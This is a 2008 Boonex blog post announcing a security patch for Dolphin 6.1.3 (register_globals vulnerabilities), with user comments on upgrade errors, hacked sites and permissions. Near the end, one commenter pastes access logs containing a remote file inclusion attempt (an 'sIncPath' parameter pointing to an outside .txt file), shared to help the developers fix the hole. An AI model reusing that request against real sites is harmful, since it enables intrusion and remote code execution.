IMPORTANT. Dolphin 6.1.3 Security Patch Release

VictorT posted 17th of July 2008 in . 78 comments.

The Dolphin 6.1.3 Security patch is released. This patch fixes vulnerabilities when the PHP setting "register_globals" is on.

Hence, it covers much code re-work overall. This patch should be applied only to 6.1.2 (no earlier versions) to move to 6.1.3 using these instructions. You are recommended to apply it, even though you have applied solutions provided by other members here, as this is more comprehensive.

For those who are taking steps by upgrading from earlier versions up to the latest release above, please make sure that "register_globals" is set to OFF on your host.

 
Comments
·Oldest
·Top
Please login to post a comment.
LightWolf
Awesome work Victor, thanks to all who created this wonderful software. I am installing the new dolphin as we speak. Hope this stops most of those mean hackers..urghhh
VictorT
You are welcome. Hope on this too.
jerry79
Thanks Victor! But could you support a Dif of the files? Cause my site is heavily moded, so i have to know what is changed to the original once.
Or maybe i dont have to use this, cause my registerd_globals are setted to off, this means i dont need it, right?

Cheers,
Jerry
VictorT
Sure, Diff is available at the instructions page to download.
jerry79
Hehe, NOW its there, when i wrote the post, there was no link ;)
sammie
Works like a charm, glad to see some of the bugs fixed too thank you team boonex i know you worked hard to get this done as quickly as possible. and it was a huge job.

just to clarify, although this patch makes it safer for dolphin site on hosts with register globals on. boonex still recommend, (as it is much safer all round) to choose a host with register globals off.
Thanks Victor,

That was quick easy and painless... now let's see what the hackers do to counter.
realmasterd
hello VictorT,

many thanks from germany!
TheGateKeeper
I thank you also Victor for your efforts on behalf of us all
Big thanks for the patch....

On another but related subject... I checked my 'cache' folder and found a sub-folder named "PPP" which contains two "acct.php" and "index.html" files.

Are these normal? I have tried to download a copy and delete the files from my server but i can't do it.

Also, I have deleted the files under the 'cache' folder" just for my own security measure. is this OK.

Please advise.
AndreyP
Better clean your cache file, but before rename it to txt file and share with us - need to learn this scripts too to understand hack attacks better ;)
i cant delete the "ppp" sub-folder and its content.

1) What shall I do/change to delete these files?

2) How could i transmit you the 'unknown' files?

thanks and let me know.
killerhaai
You have to this from your server account, if you have root access.
That map is owned by the server, thats the reasons you can't delete or rename it.
hakknslash
I get the following error when I try to compile the ORCA language file. (I changed EVERY file and folder in ORCA to 777 and still get this message)

Warning: fopen(/MYSITE/orca/conf/params.conf): failed to open stream: Permission denied in /MYSITE/orca/inc/util.inc.php on line 263

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 36

Warning: Cannot modify header information - headers see more already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 37

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 38

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 39

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/classes/en/BxXslTransform.php on line 61
VictorT
Please delete "/MYSITE/orca/conf/params.conf" file and try to compile Orca language file again.
killerhaai
I got this: Language files compilation have been failed. Please check folders permissions.?? its not compiled
hakknslash
yes... deleting that file worked... but now, since I have changed every file in my orca directory to 777 what are the proper permissions I need to set my folders and files at to maintain security?
killerhaai
I got the same errors as first writer... and deleting the the file you advized has not effect...
killerhaai
I mean as hakknslash.... Its on top at every page, included admin pages
AndreyP
6.1.3 just begin to protect your dolphin much better,
Patch will not erase viruses :)
You should clean your dolphin before
avhow
Thanks for the patch. Can I also suggest you stop promoting Host For Web since they have register globals on by default.
AndreyP
Hard to find one good and stable host with enabled all params as required ..
We recommend HFW just because this is very stable and allow change all params just using .htaccess file (use php_flag register_globals Off here)
Swiftcreek1
I use Host For Web and had Boonex do my install.....my globals were set to "OFF" from day one. Whoever did your install should have reviewed this, and I would be inclined to put some of the responsibility on that person.
jamesbowie
Can you tell me where I can fin d the security patch please. I cannot find the link anywhere.
hakknslash
Above, Click on the link in the sentence "to move to 6.1.3 using these instructions."
It will take you to http://www.boonex.com/trac/dolphin/wiki/6.1.2to6.1.3 Where the directions and links to patches are.
avhow
Its in the top blog post. They are calling it an upgrade from 6.1.2 to 6.1.3. It seems if you run an earlier version you arent covered. For security reasons they recommend you have the latest version.
killerhaai
Oke now get strange things... I can't login to my own admin center after the patch, not only the same errors like Hakknslash, but also to admin login. I fill in my data and it say's "wating" and returns to index.php login.

I use firefox 3... Dolphin updated from 6.1.2 to 6.1.3 before the patch no problems...
killerhaai
This is the error I get:


Warning: Cannot modify header information - headers already sent by (output started at /home/harry2/domains/hobipoint.nl/public_html/inc/header.inc.php:1) in /home/harry2/domains/hobipoint.nl/public_html/inc/design.inc.php on line 633

Warning: Cannot modify header information - headers already sent by (output started at /home/harry2/domains/hobipoint.nl/public_html/inc/header.inc.php:1) in /home/harry2/domains/hobipoint.nl/public_html/inc/design.inc.php on line see more 634

Warning: Cannot modify header information - headers already sent by (output started at /home/harry2/domains/hobipoint.nl/public_html/inc/header.inc.php:1) in /home/harry2/domains/hobipoint.nl/public_html/inc/design.inc.php on line 635

Warning: Cannot modify header information - headers already sent by (output started at /home/harry2/domains/hobipoint.nl/public_html/inc/header.inc.php:1) in /home/harry2/domains/hobipoint.nl/public_html/inc/design.inc.php on line 636
AndreyP
If you still have site troubles you can send your site details to me (for example) to PM (don`t forget point what I need to do :) )
gameutopia
You might want to review the update instructions for updating yoursite.com/inc/header.inc.php

Sounds like you might have omitted the line where you should insert a new.

1 little line or missed file could potentially cause errors or problems. The good news with this one is no database updating.

I'd double check the instructions and back trace all your steps for starters.
Synergy
Thanks for the patch.
Stuart038
I am getting this:

Warning: require_once(BX_DIRECTORY_PATH_INCprofiles.inc.php) [function.require-once]: failed to open stream: No such file or directory in /home/connect/public_html/admin/index.php on line 26

Fatal error: require_once() [function.require]: Failed opening required 'BX_DIRECTORY_PATH_INCprofiles.inc.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/connect/public_html/admin/index.php on line 26

And this under Orca

Warning: require_once(BX_DIRECTORY_PATH_ROOTgroups/orca/layout/uni/params.php) see more [function.require-once]: failed to open stream: No such file or directory in /home/connect/public_html/groups/orca/xml/config.php on line 89

Fatal error: require_once() [function.require]: Failed opening required 'BX_DIRECTORY_PATH_ROOTgroups/orca/layout/uni/params.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/connect/public_html/groups/orca/xml/config.php on line 89

Help!

Stuart
AndreyP
1. recheck in your header.inc.php
are here present line
define('BX_DIRECTORY_PATH_INC', $dir['inc']);
and
define('BX_DIRECTORY_PATH_ROOT', $dir['root']);
?
Stuart038
and I cannot access Admin

Help!

Stuart
Evandromar
Hello, personnel boonex, I update my dolphin to 6.1.3, even taking register_globals, off? I have doubts!
VictorT
Well, there is nothing to worry about at the moment. We look attentively at every report or suspicious things all over.
theGhost
Thanks for the patch Victor.

I built a brand new Dolphin upgraded all the way from 6.1.1 to 6.1.3 had no problems. Forgot to update the header.inc.php and guess what error I got :) Updated language files no problem. I am currently running RG_off.

When I did the upgrade on GGsite all went fine but I am still being punched :) IT DID tweek the attack thou...I'll send you the Log File. Still No Infections!
VictorT
Yes, please send me. We will look into. Thanks.
coolbuddy
do we need to apply this patch even if we download the latest version today and start a fresh website ?
Stuart038
The version for download is 6.1.3. no probs!
Stuart038
Hello AndreyP

files are:
define('BX_DIRECTORY_PATH_INC', $dir['inc']);
define('BX_DIRECTORY_PATH_ROOT', $dir['root']);
define('BX_DIRECTORY_PATH_BASE', $dir['base']);
define('BX_DIRECTORY_PATH_CACHE', $dir['cache']);
define('BX_DIRECTORY_PATH_CLASSES', $dir['classes']);
define('BX_DIRECTORY_PATH_PLUGINS', $dir['plugins']);

Stuart
Stuart038
I forgot to upload the modified inc/headerinc.php file!!
gameutopia
Thanks for the patch and update guys!! Just a thought though not everyone reads the blogs or has email notifications. If a security update is involved you might think about or consider other ways to push it to people. I've emailed a few people and they were not even aware of counting this patch the last 2 or further.

I am glad I do follow these blogs. Thanks for the updates!!
avhow
The upgrades have busted my Orca css again so all my line breaks have gone in all my Orca Forum posts! Man this is FRUSTRATING! Sometimes feel like I'm banging my head against a wall.
Nighto2007
thanks Victor

it's great ... I upgraded my site successfully

my site work fine

best regards
Rawaf
http://www.a7lakalam.com
shaneed
If my register globals are OFF, do i have to appy for this patch???
HikeMaster
My register globals are off, they've always been off, and I still got hacked by the vulnerability that this patch addresses. Apply the patch.
Juker
Thanks Victor and the Boonex team,

Am I the only one or can we all sense the entire community coming together because of this problem? I am really proud to be a part of this movement.

Kudos to DosDawg who has been working tirelessly in the forums to help as many as he can.

Juker
crswsystem
Hello Victor, I think the Patsch toll, although we do not need this Patsch, but I think that many users use the Web space is difficult and have their server right to use, very helpful.
womenscafe
I'm computer illiterate so Joombyte is doing the upgrade for me! Yipee!
Charisma
Does this fix the problem with the v6.12 RSS Feeds not working?
as far as I can tell it was something altered in the database.

I upgraded to 6.12 and my RSS feeds stopped working, does the 6.13 patch look at this problem?
Rob1960
Hackers can leave files and folders behind that are almost impossible to delete. If you suspect these files, work with technical support of the ISP to get rid of these.
Rob1960
I noticed that the Patch.zip file does not include a modified .htaccess file, nor is there a php.ini file to set register_globals off at the directory level. My provider says I must set register_globals off locally using a php.ini file. In terms of syntax, some have said using register_globals = 0 and others say register_globals = off. Also, others have suggested modifications to the .htaccess file. Could someone post a modified .htaccess file that works form them, and if anyone needs to use see more the php.ini method for setting register_globals off, could they post a version of this file? Thanks very much.
anydude
I'm pretty new here and I've added few mods to my site. I've not applied any patches by myself so far. Would these patches overwrite those mods which I've installed?
HikeMaster
Depends on the mod, but yes, mods are affected by patches, and if not applied carefully, your mods will break. It's a pain, but the best thing to do is compare each file in the patch with the corresponding file in your site with a file comparison program like SourceGear DiffMerge. Use this to ensure you don't overwrite the custom coding of the mod. If your site is live you want to apply this in a development reproduction of your site for testing first. Big pain, but its the only way to ensure see more you don't lose your mods. Even then some mods need to be recoded if the patch significantly changes default code.
jdoedtman
Dolphin Dates on Blogs, RSS feeds & Events: I've applied the patch to 6.1.3 and now all of the dates on my postings are wrong. For example, Events show a date of "_day_of_9" when I check the date is correctly set to 1 Sept 2008 and the same for Blog postings. RSS feeds show a date for the posts of "NaN".

Any ideas on how to fix this?

joe
cheluskin
Ага и отсутствующие ?> как минимум в двух файлах пофиксили . Да и ещё много чего . Вот только как бы узнать что именно было добавлено или удалено из движка . Где можно увидеть историю изменений .

P.S. говорить про безопасность в контекте этого движка не уместно моё ИМХО
JacKsoN
I make this update, but i have one probleme whit Ray suite wich can't load , when i clicked on ray application i have a error message : " LOADING ERROR"
Before this update everything works good.

If anyone have an idea ?
gregorscharff
Dear VictorT

i am happy you realesed this one also we are hacked also, i know we are a small community of artists (just70 activ) but we invite only artist who we think to come over the huge wave of artists around the world and we want to share and to show art . i was soo tired to reintegrate all the moduls and maybe in the future you will really check up the stuff of expertzzz home to be shure the customers of your script run not in a knife of again and again to "reinstall" all there see more stuff who they payed with money . your script is great and i love it total but to rebuild our site i will wait because i want to be shure we did not run again in this "black hole" of "reinstall" .
my thoughts to you and i know many is happend here in your little world called boonex but if you are a human with humans you will know what it means to say "to stay and keep cool"
kind regards

Gregor Scharff
founder and CEO of Digital Renaissances Network
& a artist with the pur power of art
gregorscharff
Dear VictorT

i am happy you realesed this one also we are hacked also, i know we are a small community of artists (just70 activ) but we invite only artist who we think to come over the huge wave of artists around the world and we want to share and to show art . i was soo tired to reintegrate all the moduls and maybe in the future you will really check up the stuff of expertzzz home to be shure the customers of your script run not in a knife of again and again to "reinstall" all there see more stuff who they payed with money . your script is great and i love it total but to rebuild our site i will wait because i want to be shure we did not run again in this "black hole" of "reinstall" .
my thoughts to you and i know many is happend here in your little world called boonex but if you are a human with humans you will know what it means to say "to stay and keep cool"
kind regards

Gregor Scharff
founder and CEO of Digital Renaissances Network
& a artist with the pur power of art

PS: maybe you found a way like moduls to create who can installed and uninstalled from the admin interface it will be so helpful for the intigrate of new options or a package for the new stuff who can be removed easyly if it makes problems . :) take care and all the best to you and your team who was always helpful for shure !!!!!!!!!!!!!
gregorscharff
a note again : please check the RMS(not ray) system because i think we got from there a attack who works well in our system (vserver)
LightWolf
I am having issues with the chat in the new dolphin release. Dolphin-v.6.1.3-Free All widgets work except the chat,it just continues to load but nothing happens. I have installed 2 times and get same thing. I also tried using the chat from 6.1.2 and a separate ray install, and that did not work. Is this just my issue or is it a dolphin issue? Should i wait for dolphin 6.2
gregorscharff
mayby you take a look at the guestbook.php someone trys nowalways to enter it :

Fri Jul 25 06:13:15 2008] [error] [client 195.58.3.163] File does not exist: /srv/www/vhosts/digital-renaicances.org/httpdocs/community, referer: http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add
[Fri Jul 25 06:13:16 2008] [error] [client 89.149.242.88] File does not exist: /srv/www/vhosts/digital-renaicances.org/httpdocs/community, referer: http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add see more

with diffrent IPs

kind regards

gregor
gregorscharff
and this is the access log from our server but we installed now all new ( just the os system not more) :

195.58.3.163 - - [25/Jul/2008:06:13:15 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.149.242.88 - - [25/Jul/2008:06:13:16 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" see more 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
90.157.115.140 - - [25/Jul/2008:06:19:18 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.0" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.182.159.1 - - [25/Jul/2008:06:19:34 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.206.238.35 - - [25/Jul/2008:06:20:51 +0200] "GET /?sIncPath=http://www.doxgroup.com/egroupware/did.txt%0D?? HTTP/1.1" 200 7137 "-" "libwww-perl/5.803"
216.206.238.35 - - [25/Jul/2008:06:21:25 +0200] "GET /community/?sIncPath=http://www.doxgroup.com/egroupware/did.txt%0D?? HTTP/1.1" 404 1086 "-" "libwww-perl/5.803"
66.249.66.66 - - [25/Jul/2008:06:24:08 +0200] "GET /community/ray/ HTTP/1.1" 404 1086 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

he/she trys to enter hahahah

hope it helps for fixing
bss1
On trying to compile Orca lanuage I am getting error "Language files compilation have been failed. Please check folders permissions."

All level 1 folders under /orca/ are set to 777.

Same problem with /groups/orca/

Can someone please guide on solving this issue.
I just uploaded the patch and now I go the the index page I get this error:

Warning: Division by zero in /mysite.com/templates/base/scripts/BxBaseIndex.php on line 445
Error Database query error

This is line 445 ---> $pages = ceil( $num / $max_num );

Any ideas? Thanks for all you guys do!!
Juker
My Site Is Being Hacked!

BEWARE - The patches do not work AND THE PROBLEM is not fixed!

I have 70 active members and on (8/3/08) Sunday night 10 members disappeared, on Monday night another 10 members disappeared, on Tuesday I began rebuilding and added 12 new members for a total of 62 and on Tuesday night 25 members disappeared. On Wednesday I removed all of the members except nine from my website and this morning (Thursday) one of the nine is missing.

I installed patch 6.1.3 with no error see more messages but when I installed the patch 6.1.4 I tried to recompile the language files but for /groups/orca or for /orca I get a "Failure To Recompile" error message and I can no longer recompile languages.

Can anyone help with the virus attack? The Dolphin patches are ineffective.

Thanks
Profesize
Hi Juker

Sounds more like you have been the victim of the software itself and not a virus.

Go to the Admin panel>Settings>Database pruning>Clean old profiles by last log in ( days ) and set it to something like 3000 otherwise it will delete your older profiles automatically.

Hope that helps.


Prof.
Juker
Attention Boonex Community - Hacker Alert!

No Password on your site is safe. My member passwords are being bypassed and all membership information is being systematically deleted. I have temporarily changed the status of my remaining existing members to unconfirmed and the hacker cannot see them. Change your memberships to unconfirmed until this hacker attack is eliminated.

I want to give the Boonex team the benefit of the doubt. I think they are working hard to beat down these hackers and see more my problem may be a new problem not covered by the patches.

Juker
beatlemanu
Has this problem been solved yet?
Profesize
Juker's problem sounds more like database pruning and not a virus.

Go to the Admin panel>Settings>Database pruning>Clean old profiles by last log in ( days ) and set it to something like 3000 otherwise it will delete your older profiles automatically.

Hope that helps.


Prof.
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.17555785179138